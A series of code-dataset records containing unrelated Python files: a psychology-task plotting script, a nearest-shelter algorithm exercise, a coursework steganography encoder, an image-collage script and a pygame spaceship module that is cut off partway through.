\n p8 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare)\n p9 = plt.figure(figsize = figdims)\n sns.heatmap(model_subj_compare.filter(regex='bias|eoptimal|ignore|subj_ts').corr())\n \n #********** Behavioral Plots **************************\n # look at RT\n p10 = plt.figure(figsize = figdims)\n plt.subplot(4,1,1)\n plot_df.rt.hist(bins = 25)\n plt.ylabel('Frequency', size = fontsize)\n \n plt.subplot(4,1,2) \n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0')['rt'],color = 'm', lw = 5, label = 'stay')\n sns.kdeplot(plot_df.query('subj_switch == 1')['rt'],color = 'c', lw = 5, label = 'switch')\n plot_df.query('subj_switch == 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,3)\n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'], color = 'm', lw = 5, label = 'repeat response')\n sns.kdeplot(plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'], color = 'c', lw = 5, label = 'change response (within task-set)')\n plot_df.query('subj_switch == 0 and rep_resp == 1')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_switch == 0 and rep_resp == 0')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.ylabel('Probability Density', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n\n \n plt.subplot(4,1,4)\n plt.hold(True)\n sns.kdeplot(plot_df.query('subj_ts == 0')['rt'], color = 'm', lw = 5, label = 'TS1')\n sns.kdeplot(plot_df.query('subj_ts == 1')['rt'], color = 'c', lw = 5, label = 'TS2')\n plot_df.query('subj_ts == 0')['rt'].hist(bins = 25, alpha = .4, color = 'm', normed = True)\n plot_df.query('subj_ts == 1')['rt'].hist(bins = 25, alpha = .4, color = 'c', normed = True)\n plt.xlabel('Reaction Time (ms)', size = fontsize)\n pylab.legend(loc='upper right',prop={'size':20})\n plt.xlim(xmin=0)\n \n \n #***********************************\n # learner nonlearner behavioral plots\n 
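    # Added note: the learner/non-learner split used in this section comes from the
    # 2-means clustering on per-subject accuracy computed earlier (centres seeded at
    # .49/.51), so the red/blue groups below reflect overall percent correct, not model fit.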
#***********************************\n plot_df = pd.concat([df,df_fail])\n df.groupby(['last_TS','context']).subj_ts.mean().reset_index() \n \n p11 = plt.figure(figsize = figdims)\n p11.subplots_adjust(hspace=.3, wspace = .3)\n \n plt.subplot2grid((2,2),(0,0))\n sns.plt.plot(delays,learner_params, 'b-o', label = 'Learners', markersize = 10)\n sns.plt.plot(delays,nonlearner_params, 'r-o', label = 'Non-Learners', markersize = 10)\n plt.xlabel('Context Lag', size = fontsize)\n plt.ylabel('Beta Weights', size = fontsize)\n pylab.legend(loc='best',prop={'size':20})\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,0), colspan = 1)\n sns.plt.scatter(range(len(group_means)),group_means, c = [['r','b'][i] for i in label])\n plt.ylabel('Accuracy', size = fontsize)\n plt.xlabel('Subject Index', size = fontsize)\n plt.xlim([-5,50])\n plt.tick_params(labelsize=15)\n \n plt.subplot2grid((2,2),(1,1), colspan = 1)\n sns.plt.plot(k,k_error, '-o')\n plt.ylabel('SSE', size = fontsize)\n plt.xlabel('Number of Clusters (k)', size = fontsize)\n plt.tick_params(labelsize=15)\n\n plt.subplot2grid((2,2),(0,1))\n for window in [(0,850)]:\n window_df = plot_df.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'b', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n plt.plot(group.index,group,'b-',lw = 4)\n\n for window in [(0,850)]:\n window_df = df_fail.query('trial_count >= %s and trials_since_switch < 27 and trial_count < %s' % (window[0], window[1]))\n plot_dict = {}\n for i in np.unique(window_df['id']):\n temp_df = window_df.query('id == \"%s\"' % i)\n plot_dict[i] = [temp_df.query('trials_since_switch == %s' % i)['correct'].mean() for i in np.unique(temp_df['trials_since_switch']) if np.sum(temp_df['trials_since_switch']==i)>5]\n plot_dict['trials_since_switch'] = list(range(max([len(arr) for arr in plot_dict.values()])))\n subplot_df = pd.DataFrame.from_dict(plot_dict, orient='index').transpose() \n \n subplot_df = pd.melt(subplot_df, id_vars = 'trials_since_switch', var_name = 'id', value_name = 'percent_correct')\n plt.scatter(subplot_df['trials_since_switch'], subplot_df['percent_correct'], color = 'r', alpha = .5) \n group = window_df.groupby('trials_since_switch').mean()['correct']\n plt.plot(group.index,group,'r-',lw = 4)\n plt.xlim(-1,28) \n plt.tick_params(labelsize=15)\n plt.ylabel('Percent Correct', size = fontsize)\n plt.xlabel('Trials Since Objective TS Switch', size = fontsize)\n\n if save == True:\n p1.savefig('../Plots/TS2%_vs_context.png', format = 'png', dpi = 300)\n p2.savefig('../Plots/Individual_subject_fits.png',format = 'png', dpi = 300)\n p3.savefig('../Plots/rt_vs_posterior_3subj.png', format = 'png', dpi = 300)\n p4.savefig('../Plots/rt_vs_confidence_3subj.png', format = 'png', dpi = 300)\n 
p5.savefig('../Plots/rt_vs_confidence.png', format = 'png', dpi = 300)\n p6.savefig('../Plots/bias2_param_value.png', format = 'png', dpi = 300)\n p7.savefig('../Plots/model_comparison.png', format = 'png', dpi = 300)\n p10.savefig('../Plots/RTs.png', format = 'png')\n p11.savefig('../Plots/Learner_vs_NonLearner.png', format = 'png', dpi = 300)\n plt.close('all')\n \n ","sub_path":"old_versions/Color_Shape_Task_V1/Analysis/Group_Analysis.py","file_name":"Group_Analysis.py","file_ext":"py","file_size_in_byte":20176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18208723","text":"'''\nШтаб гражданской обороны Тридесятой области решил обновить план спасения на случай ядерной атаки. Известно, что все n\nселений Тридесятой области находятся вдоль одной прямой дороги. Вдоль дороги также расположены m бомбоубежищ, в которых\nжители селений могут укрыться на случай ядерной атаки.\nЧтобы спасение в случае ядерной тревоги проходило как можно эффективнее, необходимо для каждого селения определить\nближайшее к нему бомбоубежище.\nФормат ввода\nВ первой строке вводится число n - количество селений (1 <= n <= 100000). Вторая строка содержит n различных целых\nчисел, i-е из этих чисел задает расстояние от начала дороги до i-го селения. В третьей строке входных данных задается\nчисло m - количество бомбоубежищ (1 <= m <= 100000). Четвертая строка содержит m различных целых чисел, i-е из этих\nчисел задает расстояние от начала дороги до i-го бомбоубежища. Все расстояния положительны и не превышают 10⁹. Селение\nи убежище могут располагаться в одной точке.\nФормат вывода\nВыведите n чисел - для каждого селения выведите номер ближайшего к нему бомбоубежища. Бомбоубежища пронумерованы\nот 1 до m в том порядке, в котором они заданы во входных данных.\nУказание\nСоздайте список кортежей из пар (позиция селения, его номер в исходном списке), а также аналогичный список для\nбомбоубежищ. Отсортируйте эти списки.\nПеребирайте селения в поря��ке возрастания.\nДля селения ближайшими могут быть два соседних бомбоубежища, среди них надо выбрать ближайшее. При переходе к следующему\nселению не обязательно искать ближайшее бомбоубежище с самого начала. Его можно искать начиная с позиции, найденной для\nпредыдущего города. Аналогично, не нужно искать подходящее бомбоубежище до конца списка бомбоубежищ: достаточно найти\nсамое близкое. 
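[English summary of the hint above: pair every village and shelter with its original
index, sort both lists by position, then sweep the villages in increasing order while
advancing a pointer into the sorted shelters; for each village only the shelter at the
pointer and its neighbour can be nearest, and the pointer is resumed from the previous
village rather than reset, so the scan stays linear after sorting.]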
Если Вы неэффективно реализуете эту часть, то решение тесты не пройдет.\nДля хранения ответа используйте список, где индекс будет номером селения, а по этому индексу будет запоминаться номер\nбомбоубежища.\n'''\n# не проходит тест 6, может потом как-нить разберусь :)\n\ndef sort_position(n):\n # input data as a tuple with distance and index and sort it out\n tempData = list(map(int, input().split()))\n mylist = []\n for i in range(n):\n manData = (tempData[i], i)\n mylist.append(manData)\n mylist.sort()\n return mylist\n\n\ndef checker(villageList, shelterList):\n # finding nearest shelters before and after the village and comparing the distance to find the closest one\n answer = []\n i = 0\n j = 0\n s_distance_j, shelter_j = shelterList[0]\n while i < len(villageList) and j < len(shelterList):\n v_distance, village = villageList[i]\n s_distance, shelter = shelterList[j]\n if v_distance > s_distance:\n s_distance_j, shelter_j = shelterList[j]\n j += 1\n else:\n diff = abs(v_distance - s_distance)\n diff_j = abs(v_distance - s_distance_j)\n if diff < diff_j:\n answer.append((village + 1, shelter + 1))\n else:\n answer.append((village + 1, shelter_j + 1))\n i += 1\n # filling the answer with the last found shelter if shelters > villages\n for remain_part in range(i, len(villageList)):\n answer.append((i + 1, shelter_j + 1))\n answer.sort()\n return answer\n\n\ndef formatting(mylist):\n for item in mylist:\n print(item[1], end=' ')\n\n\nn = int(input())\nvillageList = sort_position(n)\nm = int(input())\nshelterList = sort_position(m)\n\nformatting(checker(villageList, shelterList))\n\n''' The version which worked out\n\namount_towns = int(input())\ntowns = list(enumerate(map(int, input().split()[:amount_towns]), 1))\namount_shelters = int(input())\nshelters = list(enumerate(map(int, input().split()[:amount_shelters]), 1))\ntowns.sort(key=lambda k: k[1])\nshelters.sort(key=lambda k: k[1])\n\nindex = 0\nresult = []\n\nfor town in towns:\n while (index + 1 < amount_shelters and \n abs(town[1] - shelters[index][1]) > abs(\n town[1] - shelters[index + 1][1])):\n index += 1\n else:\n result.append([town[0], shelters[index][0]])\n\nresult.sort()\nfor i in result:\n print(i[1], end=' ')\n'''\n","sub_path":"week6_bomb_shelters.py","file_name":"week6_bomb_shelters.py","file_ext":"py","file_size_in_byte":5742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"552946396","text":"\"\"\"\nSteganography methods for the imager application.\n\nThis module provides all of the test processing operations (encode, decode)\nthat are called by the application.\n Note that this class is a subclass of Filter.\nThis allows us to layer this functionality on top of the Instagram-filters,\nproviding this functionality in one application.\n\nBased on an original file by Dexter Kozen (dck10) and Walker White (wmw2)\n\nAuthor: Yan Zhu yz2477 Aroma Dong jd778\nDate: 11/20/2019\n\"\"\"\nimport a6filter\n\n\nclass Encoder(a6filter.Filter):\n \"\"\"\n A class that contains a collection of image processing methods\n\n This class is a subclass of Filter. That means it inherits all of the\n methods and attributes of that class too. 
We do that separate the\n steganography methods from the image filter methods, making the code\n easier to read.\n\n Both the `encode` and `decode` methods should work with the most recent\n image in the edit history.\n \"\"\"\n\n def encode(self, text):\n \"\"\"\n Returns True if it could hide the text; False otherwise.\n\n This method attemps to hide the given message text in the current\n image. This method first converts the text to a byte list using the\n encode() method in string to use UTF-8 representation:\n\n blist = list(text.encode('utf-8'))\n\n This allows the encode method to support all text, including emoji.\n\n If the text UTF-8 encoding requires more than 999999 bytes or the\n picture does not have enough pixels to store these bytes this method\n returns False without storing the message. However, if the number of\n bytes is both less than 1000000 and less than (# pixels - 10), then\n the encoding should succeed. So this method uses no more than 10\n pixels to store additional encoding information.\n\n Parameter text: a message to hide\n Precondition: text is a string\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns True...)\n # The last paragraph (If the text UTF-8 encoding...)\n # The precondition (text is a string)\n assert type(text) == str\n\n current = self.getCurrent()\n\n blist = list(text.encode('utf-8'))\n bnum = len(blist)\n if bnum>999999 or len(current)-10< bnum:\n return False\n\n self._encode_pixel_str(0,'314')\n self._encode_pixel_str(1,'159')\n self._encode_pixel_str(2,'265')\n self._encode_pixel_str(3,'358')\n self._encode_pixel_str(4,'979')\n\n bnum2 = '0'*(6-len(str(bnum)))+str(bnum)\n self._encode_pixel_str(5,bnum2[:3])\n self._encode_pixel_str(6,bnum2[3:])\n\n for p in range(bnum):\n num = str(blist[p])\n if len(num) < 3:\n num = '0'*(3-len(num))+num\n self._encode_pixel_str(7+p,num)\n return True\n\n def decode(self):\n \"\"\"\n Returns the secret message (a string) stored in the current image.\n\n The message should be decoded as a list of bytes. Assuming that a list\n blist has only bytes (ints in 0.255), you can turn it into a string\n using UTF-8 with the decode method:\n\n text = bytes(blist).decode('utf-8')\n\n If no message is detected, or if there is an error in decoding the\n message, this method returns None\n \"\"\"\n # You may modify anything in the above specification EXCEPT\n # The first line (Returns the secret...)\n # The last paragraph (If no message is detected...)\n marker = ''\n for n in range(5):\n marker = marker + str(self._decode_pixel(n))\n if marker != '314159265358979':\n return None\n\n try:\n blist = []\n len = self._decode_pixel(5)*1000 + self._decode_pixel(6)\n if len == 0:\n return ''\n for n in range(len):\n blist.append(self._decode_pixel(n+7))\n text = bytes(blist).decode('utf-8')\n return text\n except:\n return None\n\n # HELPER METHODS\n def _decode_pixel(self, pos):\n \"\"\"\n Return: the number n hidden in pixel pos of the current image.\n\n This function assumes that the value was a 3-digit number encoded as\n the last digit in each color channel (e.g. red, green and blue).\n\n Parameter pos: a pixel position\n Precondition: pos is an int with 0 <= p < image length (as a 1d list)\n \"\"\"\n # This is helper. 
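        # Worked example (added): hiding the byte value 245 in the pixel (132, 57, 208)
        # via _encode_pixel_str(pos, '245') rewrites the last digit of each channel,
        # giving (132, 54, 205); this method then recovers
        #   (132 % 10)*100 + (54 % 10)*10 + (205 % 10) = 200 + 40 + 5 = 245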
You do not have to use it.\n #You are allowed to change it.\n # There are no restrictions on how you can change it.\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n return (red % 10) * 100 + (green % 10) * 10 + blue % 10\n\n def _encode_pixel_str(self, pos, str):\n \"\"\"\n Encodes the 3-digit number represented by the string in the pixel at\n the position pos in the current image.\n This function will take the string that represents a 3-digit\n number and encode it at the given position.\n The first digit will be encoded in red, the second\n will be encoded in green, and the third be encoded in blue.\n Encoding a byte value will result in an invalid rgb value (> 255)\n thus will be substracted from the tens place of the appropriate\n color value.\n\n Parameter pos: a pixel position\n Precondition: pos is an int and 0 <= p < image length\n Parameter str: a string representation of a number to encode\n Precondition: a str of a 3-digit integer\n \"\"\"\n rgb = self.getCurrent()[pos]\n red = rgb[0]\n green = rgb[1]\n blue = rgb[2]\n\n d1 = int(str[0])\n d2 = int(str[1])\n d3 = int(str[2])\n\n red = (red//10)*10 +d1\n green = (green//10)*10 +d2\n blue = (blue//10)*10 +d3\n\n if red>255:\n red = red-10\n if green>255:\n green = green-10\n if blue>255:\n blue = blue-10\n\n self.getCurrent()[pos] = (red,green,blue)\n","sub_path":"Imager/a6encode.py","file_name":"a6encode.py","file_ext":"py","file_size_in_byte":6149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"18518180","text":"import matplotlib.pyplot as plt\r\nimport os.path\r\nimport numpy as np\r\nimport PIL\r\nimport PIL.ImageDraw\r\n\r\n#Open explosion picture in numpy\r\ndirectory = os.path.dirname(os.path.abspath(__file__))\r\nfilepath_explosion = os.path.join(directory, 'explosion.jpg')\r\nexplosion_numpy = plt.imread(filepath_explosion)\r\n\r\n#Open cat image in numpy\r\nfilepath_cat = os.path.join(directory, 'cat.jpg')\r\ncat_numpy = plt.imread(filepath_cat)\r\n\r\n#Open dog image in numpy\r\nfilepath_dog = os.path.join(directory, 'dog.jpg')\r\ndog_numpy = plt.imread(filepath_dog)\r\n\r\n#Convert all numpy images to PIL\r\nexplosion_image_pil = PIL.Image.fromarray(explosion_numpy)\r\ncat_image_pil = PIL.Image.fromarray(cat_numpy)\r\ndog_image_pil = PIL.Image.fromarray(dog_numpy)\r\n\r\n#(Attempting to) cut the background from the cat and dog pictures.\r\ncat_crop = cat_image_pil.crop((404, 262, 1659, 2182))\r\ndog_crop = dog_image_pil.crop((198, 83, 913, 884))\r\n\r\n#Reduce size of cat and dog to fit on explosion picture.\r\ncat_img_small = cat_crop.resize((250, 350))\r\ndog_img_small = dog_crop.resize((550, 380))\r\n\r\n#Place cat and dog on appropriate locations of explosion\r\nexplosion_image_pil.paste(cat_img_small,(877, 656))\r\nexplosion_image_pil.paste(dog_img_small,(304, 155))\r\n\r\n#Convert explosion image back to numpy\r\nexplosion_numpy = np.array(explosion_image_pil)\r\n\r\n#Recolor the cat's eyes to an evil red\r\nfor r in range(719, 730):\r\n for c in range(914, 931):\r\n if sum(explosion_numpy[r][c])< 550:\r\n explosion_numpy[r][c] = [255,0,0] \r\nfor r in range(720, 730):\r\n for c in range(958, 972):\r\n if sum(explosion_numpy[r][c])< 280:\r\n explosion_numpy[r][c] = [255,0,0] \r\n\r\n#Recolor the explosion to...green?\r\nfor r in range(531,847):\r\n for c in range(256,834):\r\n if sum(explosion_numpy[r][c]) > 350:\r\n explosion_numpy[r][c] = [0,177,0]\r\n\r\n#Display the completed image.\r\nfig, ax = plt.subplots(1, 
1)\r\nax.imshow(explosion_numpy, interpolation='none')\r\nfig.show()\r\n\r\n#Photos taken from: Wikipedia (reuse with edit rights)","sub_path":"files/1.4 Project.py","file_name":"1.4 Project.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"121419663","text":"import misc, math, orders, pygame, effects\n\ntry:\n import psyco\n psyco.profile()\nexcept ImportError:\n pass\n\nclass Ship():\n #basic stats for drawing & position.\n radius = 8 # Size of the ship from the centre - size of largest part (if multiple parts are added)\n rotation = math.radians(270.0) # Initial rotation of the ship. Changes every now and then for testing, doesn't matter usually.\n # r43 : Changed to rotation instead of intRotation\n dead = False # I'M ALIVEEEE\n #speed stats.\n speed = 2.5\n rotateSpeed = 0.05 # Rotation\n\n health = 1 # integer for the health of the ship\n\n points = [] # List of veticies that make up the ship.\n\n formation = False\n \n def __init__(self, view, player, x, y):\n self.player = player\n self.view = view\n self.colour = self.player.colour\n self.x, self.y = x, y\n self.shieldRadius = self.radius + 2\n self.orders = [orders.Idle(self)]\n self.moving = False\n self.built = False\n self.calcPoints()\n self.calcExtras() # Stuff that isn't points but needs to be calced.\n \n def drawShield(self, hitBy):\n self.view.effects.append(effects.BubbleShield(self, self.view, (self.x, self.y), self.shieldRadius, 0))\n #self.view.effects.append(effects.AngleShield(self, self.view, (self.x, self.y), self.radius + 2, 0, hitBy))\n \n def damaged(self, amount, hitBy):\n self.health -= amount\n self.drawShield(hitBy)\n if self.health <= 0:\n self.die()\n \n def remove(self):\n self.dead = True\n for i in range(len(self.player.ships)):\n if self.player.ships[i] == self:\n del self.player.ships[i]\n break\n for i in range(len(self.view.selectedShips)):\n if self.view.selectedShips[i] == self:\n del self.view.selectedShips[i]\n break\n del self\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. 
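# --- editor's sketch, not part of the original ships.py --------------------
# remove() above deletes self by scanning player.ships and selectedShips for
# a matching index; for unique objects, list.remove() with a guard is the
# shorter equivalent:
def remove_item(collection, item):
    # Removes item if present; tolerates "already removed".
    try:
        collection.remove(item)
    except ValueError:
        pass
# ---------------------------------------------------------------------------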
Dunno if we want need these but hum.\n\n def calcExtras(self):\n pass\n \n def draw(self):\n if self.needsToCalcPoints:\n self.calcPoints()\n #self.drawOrders()\n pygame.draw.polygon(self.view.screen, misc.BLACK, self.offsetPoints())\n pygame.draw.aalines(self.view.screen, self.colour, True, self.offsetPoints())\n\n def drawOrders(self):\n lastx, lasty = self.x, self.y\n for order in self.orders:\n tempxy = order.xy()\n if not tempxy is False:\n pygame.draw.line(self.view.screen, order.colour, ((lastx - self.view.x) * self.view.zoom, (lasty - self.view.y) * self.view.zoom), ((tempxy[0] - self.view.x) * self.view.zoom, (tempxy[1] - self.view.y) * self.view.zoom))\n #pygame.draw.circle(screen, (20,20,20), ((order.x - view.x) * view.zoom, (order.y - view.y) * view.zoom), 2)\n lastx, lasty = tempxy[0], tempxy[1]\n \n def rotateTowardAngle(self, angle):\n if misc.positive(angle - self.rotation) < self.rotateSpeed: # If rotation speed is bigger than the amount which you need to turn\n self.rotation = angle # then only turn to face the desired angle\n else:\n if misc.normalisedAngle(angle - self.rotation) > math.pi: # If the angle which you're rotating towards is more 180 degrees to the right, it makes more sense to turn left\n self.rotation = misc.normalisedAngle(self.rotation - self.rotateSpeed) # Turn left by self.rotateSpeed\n else:\n self.rotation = misc.normalisedAngle(self.rotation + self.rotateSpeed) # Turn right by self.rotateSpeed\n self.needsToCalcPoints = True\n\n def moveForward(self): \n self.y -= math.cos(self.rotation) * self.speed\n self.x += math.sin(self.rotation) * self.speed\n self.needsToCalcPoints = True\n\n def poll(self):\n #update the ships data\n self.orders[0].poll()\n self.calcExtras()\n# self.view.lowEffects.append(effects.StaticParticle(self.view, self.x + self.radius * math.sin(self.rotation + math.pi), (self.y - self.radius * math.cos(self.rotation + math.pi)), 5))\n\n def angleToXY(self, x, y):\n #calculate the angle from the referenced ships heading to the\n #given x,y point.\n if self.y - y > 0:\n return misc.normalisedAngle(math.atan((self.x-x)/(y-self.y)))\n elif self.y - y == 0:\n return misc.normalisedAngle(-math.atan(self.x-x))\n else:\n return misc.normalisedAngle(math.atan((self.x-x)/(y-self.y))+math.pi)\n\n def distanceFrom(self, x, y):\n #Pythagoras up in this. 
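# --- editor's sketch, not part of the original ships.py --------------------
# angleToXY above branches on the sign of (self.y - y); math.atan2 covers all
# quadrants (and the vertical case) in one call. With the same convention as
# moveForward (0 = up, clockwise positive), an equivalent helper would be:
import math

def angle_to_xy(x1, y1, x2, y2):
    # dx = sin(theta), dy = -cos(theta), so theta = atan2(dx, -dy).
    return math.atan2(x2 - x1, y1 - y2) % (2 * math.pi)
# ---------------------------------------------------------------------------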
yeah boy.\n return math.sqrt((self.x-x)**2 + (self.y-y)**2)\n\n def offsetPoints(self):\n points = []\n for point in self.points:\n points.append(((point[0] - self.view.x) * self.view.zoom, (point[1] - self.view.y) * self.view.zoom))\n return points\n\n def nextOrder(self):\n self.orders.pop(0)\n if len(self.orders) == 0:\n self.moving = False\n self.orders.append(orders.Idle(self))\n\n def queueOrder(self, order):\n if len(self.orders) > 0:\n if not isinstance(self.orders[-1], orders.Idle):\n self.orders.append(order)\n self.orders[-1].setShip(self)\n else:\n self.setOrder(order)\n else:\n self.setOrder(order)\n\n def setOrder(self, order):\n if self.built:\n self.orders = [order]\n self.orders[0].setShip(self)\n else:\n self.orders = [orders.Idle(self), order]\n self.orders[1].setShip(self)\n\n def justBuilt(self):\n self.nextOrder()\n self.built = True\n\n def select(self):\n self.view.selectedShips.append(self)\n\n def drawBounding( self ):\n #Calculate the scaled center\n xCenter = ( self.x - self.view.x ) * self.view.zoom;\n yCenter = ( self.y - self.view.y ) * self.view.zoom;\n\n #Calculate the scaled size\n zSize = ( ( self.shieldRadius ) * self.view.zoom )\n\n #Calculate the minimum x for the bounding box\n xMin = xCenter - zSize\n xMax = xCenter + zSize\n \n #Calculate the minimum y for the bounding box\n yMin = yCenter - zSize\n yMax = yCenter + zSize\n \n #Draw bounding circle\n pygame.draw.circle(self.view.screen, misc.MIDGREEN, ((self.x - self.view.x) * self.view.zoom, (self.y - self.view.y) * self.view.zoom), (self.shieldRadius + 2) * self.view.zoom, 1)\n\t\t\n \"\"\"\n #Draw bounding box of object\n \n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMax ), ( xMax, yMax ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMax ), ( xMax, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMax, yMin ), ( xMin, yMin ),2 )\n pygame.draw.line(self.view.screen, misc.GREY, ( xMin, yMin ), ( xMin, yMax ),2 )\n \"\"\"\n \n # SPECIFC SHIP CLASSES START HERE ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! ! !\n\nclass S1s1(Ship):\n \"\"\" as of rev 12 now a list\"\"\"\n health = 10\n radius = 5\n shieldRadius = 5\n #buildInfo\n buildCost = 2\n buildTime = 400\n rotateSpeed = 0.05\n speed = 1\n canAttack = True # this ship has a weapon! useful for setting ui & making sure that ships that can't attack when selected\n # with those that can don't get an erroneus attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines i'll code it as a list. 
or something.\n \n On S1s1 it's calcpointed as a point nearer the rear of the ship.\n \"\"\"\n # and we create a FlickerCircle for it...\n # FlickerCircle.__init__(self, view, xyAsTuple, size, speed, colour):\n self.engineFlicker = effects.FlickerCircle(view, self.enginePoint, 2.5, 0.25, misc.WHITE)\n view.lowEffects.append(self.engineFlicker)\n # this needs to have it's xy updated in calcpoints.\n Ship.__init__(self, view, player, x, y)\n \n def calcPoints(self):\n #calculate the three points of the triangle relative to the center xy of the ship\n #and the radius given to the ship.\n \n # starboard side\n self.points = [(self.x + self.radius * math.sin(self.rotation), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 2.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 2.7 * math.pi / 3))),\\\n # these two lines are the inner dips for the engine.\n (self.x + (self.radius-3) * math.sin(self.rotation + 2.6 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 2.6 * math.pi / 3))),\\\n (self.x + (self.radius-3) * math.sin(self.rotation + 3.4 * math.pi / 3), (self.y - (self.radius-3) * math.cos(self.rotation + 3.4 * math.pi / 3))),\\\n # port side.\n (self.x + self.radius * math.sin(self.rotation + 3.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3.7 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \n def calcExtras(self):\n self.hardpoints = [(self.x + (self.radius + 3) * math.sin(self.rotation), (self.y - (self.radius + 8) * math.cos(self.rotation)), self.rotation)]\n # engine point calcs. THESE NEED TO BE MOVED TO CALCPOINTS WHEN THEY'RE ONLY DRAWING WHEN ONSCREEN.\n # calculate the xy.\n self.enginePoint = ((self.x + (self.radius - 3.5) * math.sin(self.rotation + 3 * math.pi / 3)), (self.y - (self.radius - 3.5) * math.cos(self.rotation + 3 * math.pi / 3)))\n # update the xy.\n if self.moving:\n self.engineFlicker.xy = self.enginePoint\n self.engineFlicker.visible = True # this could be handled in the poll of the FlickerCircle.\n # but it would be less offscreen efficient - this only gets polled when onscreen.\n else:\n self.engineFlicker.visible = False\n i = 0\n for launcher in self.launchers:\n launcher.hardpoint = self.hardpoints[i]\n launcher.poll()\n i += 1\n \n def die(self):\n self.view.effects.append(effects.ExplosionShip(self.view, self, 10))\n self.view.effects.append(effects.Explosion(self.view, (self.x, self.y), 0.5, (self.radius * 4), misc.WHITE))\n #and remove the ship when done.\n self.remove()\n #any player related stats go here. like death count and such. 
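# --- editor's sketch, not part of the original ships.py --------------------
# The hand-unrolled vertex lists in calcPoints all repeat one expression; a
# data-driven variant keeps each hull as (radius, k) pairs, where the vertex
# sits at angle rotation + k * pi / 3, exactly as in the formulas above:
import math

def hull_points(x, y, rotation, shape):
    return [(x + r * math.sin(rotation + k * math.pi / 3),
             y - r * math.cos(rotation + k * math.pi / 3))
            for (r, k) in shape]
# ---------------------------------------------------------------------------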
Dunno if we want need these but hum.\n self.engineFlicker.die()\n\nclass S1s2(Ship):\n \"\"\" as of rev 12, now a list \"\"\"\n intEnginePoint = [2, 3]\n\n #buildInfo\n buildCost = 10\n buildTime = 10\n \n def calcPoints(self):\n self.points = [((self.x + self.radius * math.sin(self.rotation)), (self.y - self.radius * math.cos(self.rotation))),\\\n (self.x + self.radius * math.sin(self.rotation + 1.7 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 1.7 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 3 * math.pi / 3))),\\\n (self.x + self.radius * math.sin(self.rotation + 4.3 * math.pi / 3), (self.y - self.radius * math.cos(self.rotation + 4.3 * math.pi / 3)))]\n self.needsToCalcPoints = False\n \nclass S1s4(Ship):\n \"\"\" Spear class cruiser \"\"\"\n health = 50\n radius = 20\n shieldRadius = 22\n #buildInfo\n buildCost = 10\n buildTime = 1000\n rotateSpeed = 0.005\n speed = 0.2\n canAttack = True # this ship has a weapon! useful for setting ui & making sure that ships that can't attack when selected\n # with those that can don't get an erroneus attack order.\n launchers = [] # weapon related values\n hardpoints = []\n \n def __init__(self, view, player, x, y):\n self.enginePoint2 = self.enginePoint1 = (x, y) # engine points. one needs to be initialised so it is...\n \"\"\"\n Please note that enginePoints function like hardpoints, due to the nature of the flickerCircle effect.\n Ho hum. If a ship has more than three engines i'll code it as a list. or something.\n \n On 